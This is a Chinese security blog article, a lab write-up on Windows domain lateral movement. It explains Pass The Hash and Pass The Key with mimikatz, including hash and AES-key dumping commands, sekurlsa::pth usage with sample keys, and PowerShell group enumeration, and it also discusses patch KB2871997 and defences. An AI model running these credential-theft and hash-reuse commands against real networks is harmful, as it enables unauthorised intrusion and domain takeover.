博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
域渗透——Pass The Hash & Pass The Key
阅读量:7128 次
发布时间:2019-06-28

本文共 4566 字,大约阅读时间需要 15 分钟。

三好学生 · 2015/12/28 10:15

0x00 前言


对于Pass The Hash大家应该都很熟悉,在2014年5月发生了一件有趣的事。

微软在2014年5月13日发布了针对Pass The Hash的更新补丁kb2871997,标题为“Update to fix the Pass-The-Hash Vulnerability”

而在一周后却把标题改成了“Update to improve credentials protection and management”

下面就结合这中间发生的事情更进一步的研究域渗透。

0x01 简介


在域渗透中,Hash和Key尤为重要,对其获取和利用一直是攻防双方最主要的关注点,所以本次就从hash 和key开始。

0x02 测试环境


域控:

#!bashos:server 2008 r2 x64ip:192.168.40.132复制代码

域内主机:

#!bashos:win7 x64ip:192.168.40.225复制代码

0x03 Pass The Hash


在上篇LAPS中提到,如果内网主机的本地管理员账户密码相同,那么可以通过pass the hash远程登录到任意一台主机,操作简单、威力无穷。

在域环境中,利用pass the hash的渗透方式往往是这样的:

  1. 获得一台域主机的权限
  2. Dump内存获得用户hash
  3. 通过pass the hash尝试登录其他主机
  4. 继续搜集hash并尝试远程登录
  5. 直到获得域管理员账户hash,登录域控,最终成功控制整个域

下面简要介绍一下Pass The Hash技术发展的几段历史

1、2012年12月

微软发布了针对Pass The Hash攻击的防御指导,链接如下:

如图

文章提到了一些防御方法,并在文章中说明了为什么不针对Pass The Hash提供更新补丁。

所以那时候Pass The Hash成为了主流的域渗透方法。

2、2014年5月13日

微软终于发布了更新补丁kb2871997,禁止本地管理员账户用于远程连接,这样就无法以本地管理员用户的权限执行wmi、PSEXEC、schtasks、at和访问文件共享。

然而,Craig在测试中发现,在打了补丁之后,常规的Pass The Hash已经无法成功,唯独默认的 Administrator (SID 500)账号例外,利用这个账号仍可以进行Pass The Hash远程连接。

并且值得注意的是即使administrator改名,它的SID仍然是500,这种攻击方法依然有效。所以对于防御来说,即使打了补丁也要记得禁用SID=500的管理员账户。

相关链接如下:

3、如今

大家对Pass The Hash的认识越来越高,防御方法越来越多,比如上一篇提到的LAPS解决了域内主机本地管理员密码相同的问题。

同样,禁用NTLM使得psexec无法利用获得的ntlm hash进行远程连接。

4、mimikatz出现

它的出现再次改变了格局。mimikatz实现了在禁用NTLM的环境下仍然可以远程连接。

下面就实际测试一下其中的细节

0x04 Pass The Key


测试1:使用NTLM hash远程连接

已知信息:

#!bash* Username : a* Domain   : TEST* NTLM     : efa85b42d77dc2fdbdbdb767792b0a11远程主机ip:192.168.40.132复制代码

如图

在测试主机上:

以管理员权限运行

#!bashmimikatz "privilege::debug" "sekurlsa::pth /user:a /domain:test.local /ntlm:efa85b42d77dc2fdbdbdb767792b0a11"复制代码

弹出cmd

#!bashdir \\192.168.40.132\c$复制代码

成功

如图

注:

虽然"sekurlsa::pth"在mimikatz中被称之为"Pass The Hash",但是其已经超越了以前的"Pass The Hash",部分人将其命名为"Overpass-the-hash",也就是"Pass-the-key"

测试2:使用aes key远程连接

已知信息:

#!bash* Username : a* Domain   : TEST.LOCAL* Key List :    aes256_hmac       f74b379b5b422819db694aaf78f49177ed21c98ddad6b0e246a7e17df6d19d5c    aes128_hmac       8cce86e4b0630f07fcf5f2110068c421    rc4_hmac_nt       efa85b42d77dc2fdbdbdb767792b0a11    rc4_hmac_old      efa85b42d77dc2fdbdbdb767792b0a11    rc4_md4           efa85b42d77dc2fdbdbdb767792b0a11    rc4_hmac_nt_exp   efa85b42d77dc2fdbdbdb767792b0a11    rc4_hmac_old_exp  efa85b42d77dc2fdbdbdb767792b0a11复制代码

注:

获取aes key 的mimikatz命令为:
mimikatz "privilege::debug" "sekurlsa::ekeys"

如图

Tips:

通常情况下无法对mimikatz输出回显的内容进行复制,一种好的方法是使用日志记录功能将回显内容输出到文件中,开启日志记录功能后会把输出回显的内容保存在同级目录下的mimikatz.log中,命令参考如下:
mimikatz log privilege::debug sekurlsa::ekeys
如果通过右键-编辑-标记的方式复制数据,当前窗口会崩溃,如图:

在测试主机上:

以管理员权限运行

#!bashmimikatz "privilege::debug" "sekurlsa::pth /user:a /domain:test.local /aes256:f74b379b5b422819db694aaf78f49177ed21c98ddad6b0e246a7e17df6d19d5c" 复制代码

发现无法导入aes256

如图

无法远程连接,如图

查看mimikatz的相关资料发现如下信息:

ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable) ; AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.

根据提示,尝试在系统安装补丁kb2871997后继续测试

测试3:使用aes key远程连接(kb2871997 Installed)

已知信息:

#!bash* Username : a* Domain   : TEST.LOCAL* Key List :    aes256_hmac       f74b379b5b422819db694aaf78f49177ed21c98ddad6b0e246a7e17df6d19d5c    aes128_hmac       8cce86e4b0630f07fcf5f2110068c421    rc4_hmac_nt       efa85b42d77dc2fdbdbdb767792b0a11    rc4_hmac_old      efa85b42d77dc2fdbdbdb767792b0a11    rc4_md4           efa85b42d77dc2fdbdbdb767792b0a11    rc4_hmac_nt_exp   efa85b42d77dc2fdbdbdb767792b0a11    rc4_hmac_old_exp  efa85b42d77dc2fdbdbdb767792b0a11测试主机:安装kb2871997补丁复制代码

如图

在测试主机上:

以管理员权限运行

#!bashmimikatz "privilege::debug" "sekurlsa::pth /user:a /domain:test.local /aes256:f74b379b5b422819db694aaf78f49177ed21c98ddad6b0e246a7e17df6d19d5c" 复制代码

可以成功导入aes256

如图

远程连接

#!bashdir \\WIN-8VVLRPIAJB0\c$复制代码

成功

如图

注:

dir要使用主机名 而不是ip,不然会提示用户名或密码错误

换用aes128测试:

#!bashmimikatz "privilege::debug" "sekurlsa::pth /user:a /domain:test.local /aes128:8cce86e4b0630f07fcf5f2110068c421" 复制代码

如图

成功

注:

如果不更换密码,aes key可以一直被用来远程连接。

0x05 补充


如果域控权限分配不严格,我们在域普通用户主机下通过wmi查询可以查到当前域内的用户组

1、查看Administrators组

powershell执行

#!bash$members = @($([ADSI]”WinNT://TEST/Administrators”).psbase.Invoke(“Members”))$members | foreach { $_.GetType().InvokeMember(“ADspath”, ‘GetProperty’, $null, $_, $null) } 复制代码

如图

2、查看Domain Users组

#!bash$members = @($([ADSI]”WinNT://TEST/Domain Users”).psbase.Invoke(“Members”))$members | foreach { $_.GetType().InvokeMember(“ADspath”, ‘GetProperty’, $null, $_, $null) }复制代码

如图

0x06 小结


做任何事情都一样,细节往往决定成败,只有在深入了解后我才发现aes key和kb2871997之间的关系,才解锁了远程连接的新方法。

0x07 参考链接:


本文由三好学生原创并首发于乌云drops,转载请注明

你可能感兴趣的文章
java 简单的加解密操作
查看>>
qmake 之 CONFIG 与 QT 乱谈
查看>>
ExtJS 创建动态加载树
查看>>
我的友情链接
查看>>
tensorflow入门简单卷积神经网络
查看>>
我的友情链接
查看>>
the dude 使用教程和一点感觉
查看>>
Spring4+Hibernate4 注解整合配置
查看>>
螺旋数字程序
查看>>
Pyhton 第九章 正则表达式
查看>>
mysql主从配置
查看>>
Jconsole远程监控tomcat 的JVM内存(linux、windows)
查看>>
分布式项目(一)iot-pt
查看>>
JFreeChart开源图表组件在Java开发中的应用(一)
查看>>
使用ZooKeeper ACL特性进行znode控制
查看>>
struts2 跳转类型介绍 result type=chain、dispatcher、redirect(redirect-action)
查看>>
宜春之行
查看>>
我的友情链接
查看>>
Exchange2010 dag 的缷载
查看>>
2011/11/14 1:52 坚持就会胜利
查看>>